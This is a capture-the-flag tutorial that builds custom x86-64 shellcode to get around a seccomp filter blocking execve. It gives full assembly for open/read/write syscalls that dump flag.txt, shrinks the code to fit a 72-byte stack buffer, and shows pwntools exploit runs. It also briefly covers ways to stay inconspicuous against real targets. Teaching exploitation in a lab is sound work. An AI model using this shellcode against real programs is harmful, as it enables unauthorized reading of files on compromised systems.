This challenge is very similar to Leaked Shellcode with a major difference. For this challenge, we'll practice writing our own shellcode for when Shellstorm doesn't have an exploit to do what we need.
First, we'll use Leaked Shellcode's exploit against this binary. When we run it:
[*] '/ironforge/chall' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: PIE enabled Stack: Executable RWX: Has RWX segments Stripped: No [+] Starting local process '/ironforge/chall': pid 94425 [*] buf: 0x7ffc92c37f40 [*] Switching to interactive mode What do you want to write there? Thank you! [*] Got EOF while reading in interactive $ [*] Interrupted [*] Process '/ironforge/chall' stopped with exit code -31 (SIGSYS) (pid 94425)
We get SIGSYS
. Using man 7 signal
we can see what this error means:
SIGSYS P2001 Core Bad system call (SVr4);
see also seccomp(2)
It mentions checking man 2 seccomp
, which uses SIGSYS
as its error for using disallowed system calls.
We see via ldd
(or the source code) that seccomp
is used.
libseccomp.so.2 => /lib/x86_64-linux-gnu/libseccomp.so.2 (0x00007fd56a622000)
seccomp
for this binary to run. This can be done with:sudo apt-get install libseccomp-dev
seccomp
alllows for the disabling of certain system calls. In this case, it's disabled execve
and execveat
, so our old exploit no longer works. We'll need to write our own.
First, we need to decide what the shellcode should do. Since we just need the flag.txt
file, we can simply do that. In C, we would do something like:
FILE *fp = fopen("flag.txt", "r"); fgets(buffer, sizeof(buffer), fp); puts(buffer);
These functions are libc
functions. We can find these inside libc
and call them directly, but this is difficult. We become subject to ASLR and knowing the base address of libc
. Instead, we can use system calls to do this. This would look something like:
int fd = open("flag.txt", O_RDONLY); read(fd, buffer, sizeof(buffer)); write(fd, buffer, sizeof(buffer));
Using the x64 syscall table we can get these system calls, arguments, and register values. x64 system calls use the same register scheme as regular functions, with the addition of rax
being used for the system call number.
First, we must open the file. open
has the following signature:
int open(const char *pathname, int flags);
We don't have our own place to store memory. We must use the stack. This becomes problematic because our instructions are also stored on the stack. Too much pushing and you may overwrite your own instructions. This is especially critical in smaller spaces.
open
takes a char*
for the pathname, meaning we need an address that points to flag.txt
. Since it's not already in the binary, we must introduce it into the shellcode. We do this by pushing it onto the stack and saving rsp
.
mov rbx, 0x7478742e67616c66 push 0x0 push rbx mov rdi, rsp
push 0x0
?open
will keep reading until it finds one. Since flag.txt
is exactly 8 characters, we need an extra instruction to push it.You can pretty easily write a script that converts a string into this push
instruction using Python.
Then, we can load the other registers and call syscall
:
; open(flag.txt, NULL, NULL) mov al, 0x2 mov rbx, 0x7478742e67616c66 push 0x0 push rbx mov rdi, rsp xor rsi, rsi xor rdx, rdx syscall
We'll need to store the return of this (rax
) because it contains the file descriptor of the open socket. This is where Caller vs. Callee Registers comes into play. We cannot use a caller-saved register because we can't guarantee it's security. So, I chose r10
to secure my file descriptor.
mov r10, rax
Then, we need to read bytes from the flag. We aren't told its length, so we will do this one in loops. We'll read a few bytes, write a few bytes, then check if we're at the end.
First, establish the buffer we'll write to:
push qword 0x0
Then, label our loop:
.loop:
read
which has the signature:ssize_t read(int fd, void buf[.count], size_t count);
This is pretty simple to do:
; read(fd, rsp, 0x8) mov rdi, r10 xor rax, rax mov rsi, rsp mov rdx, 0x8 syscall
read
to decide the number of bytes to write.; write(fd, stdout, 0x20) mov rdx, rax mov rdi, 1 mov rax, 1 syscall
Finally, we must check if we're done. We can compare this return to 0x8
to see if we wrote 0x8
bytes.
cmp rax, 0x8 jl .done jmp .loop
.done
doesn't need anything under it because at this point, we'll have our flag.
I said a few things during that explanation that are worthy of explaining further.
r10
at all?We need r10
because the write
system call will clobber rdi
since it needs to change it to the stdout
file descriptor. Therefore, the flag.txt
file descriptor must be stored elsewhere so we can load it each run.
This is not an obvious choice that required a bit of forethought. In the end, we need to compare the number of bytes read from the file descriptor (the return of read
) to 0x8
(the intended read size). If we read less than this, we reached the end of the file.
If we chose to always write 0x8
bytes, write
will always return 0x8
and our comparison would never work. Therefore, we choose to use read
's return to write that many bytes and use write
's return to check if we're at the end.
Another way to do this is to move the check between the read
and write
calls. We would need to change the check to only check for read
returning 0
, otherwise we'll miss a few bytes in the final write.
In this scenario, we don't need to do anything in .done
because we'll already have the flag. What we'll notice at the end, however, is that the program will crash. This is because it'll run out of valid instructions.
If we were attempting this against a real target and wanted to remain inconspicuous, we would do a few things depending on the situation:
mov rdi, r10 mov rax, 0x3 ; sys_close syscall
sys_exit
to exit the program.xor rdi, rdi mov rax, 0x3c syscall
However, if we stole execution and the program was expected to do more (such as a reactor loop), we would want to return execution. This might involve storing the instruction and stack pointers using a trampoline. Coming soon we'll have a course on shellcoding that will cover this in more depth.
First, we need to compile.
nasm -f bin -o sc.bin sc.asm
Then, we can read this file into our exploit:
with open("sc.bin", "rb") as f: sc = f.read()
This replaces our old sc
. This challenge has a slightly larger buffer, so we'll adjust the ljust
to 0x58
bytes.
When we run it:
[*] '/ironforge/chall' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: PIE enabled Stack: Executable RWX: Has RWX segments Stripped: No [+] Starting local process '/ironforge/chall': pid 128923 [*] buf: 0x7ffe9aea2be0 [*] Switching to interactive mode What do you want to write there? Thank you! IFC{PL4C[*] Got EOF while reading in interactive $ [*] Process '/ironforge/chall' stopped with exit code -11 (SIGSEGV) (pid 128923) [*] Got EOF while sending in interactive
It started to work but died! What we'll notice is that our shellcode doesn't fit the buffer:
$ wc -c sc.bin 76 sc.bin
Our buffer was only 72
big! We need to make it smaller.
As discussed in Assembly Instructions, instructions have various lengths. Most notably is Register Extension (REX) which adds size for the 64-bit instructions. When applicable, we'll attempt to shorten instructions.
We can shorten every rax
-related instruction by zeroing out the register at the beginning and only ever using the least-significant byte. We can do this on two assumptions:
open
returns a file descriptor, and read
and write
return a number <= 0x8
.rax
. This can be a bold assumption but more often that not works in shellcoding. We wouldn't really do this if we were writing a program from scratch.Then, we can change rdx
in read
and write
to dl
knowing that we zeroed out rdx
before the open
syscall. We also know that rdi
only holds one byte because it holds a file descriptor, so we can change that, too.
When shortening all the registers, our assembly becomes:
org 0 bits 64 section .text global _start _start: ; Clear rax xor rax, rax ; open(flag.txt, NULL, NULL) mov al, 0x2 mov rbx, 0x7478742e67616c66 push 0x0 push rbx mov rdi, rsp xor rsi, rsi xor rdx, rdx syscall mov r10d, eax ; Buffer for writing push qword 0x0 .loop: ; rax = read(fd, rsp, 0x8) mov edi, r10d mov al, 0 mov rsi, rsp mov dl, 0x8 syscall ; write(fd, stdout, rax) mov dl, al mov dil, 1 mov al, 1 syscall cmp al, 0x8 jl .done jmp .loop .done:
This shortens our assembly to 61
bytes, which fits into the buffer.
If we run this, we get:
*] '/ironforge/chall' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: PIE enabled Stack: Executable RWX: Has RWX segments Stripped: No [+] Starting local process '/ironforge/chall': pid 134755 [*] buf: 0x7ffcdf38c300 [*] Switching to interactive mode What do you want to write there? Thank you! IFC{PL4C3H0LD3R_FL4G_H3R3!} [*] Got EOF while reading in interactive $ [*] Process '/ironforge/chall' stopped with exit code -11 (SIGSEGV) (pid 134755) [*] Got EOF while sending in interactive
This yields our entire flag!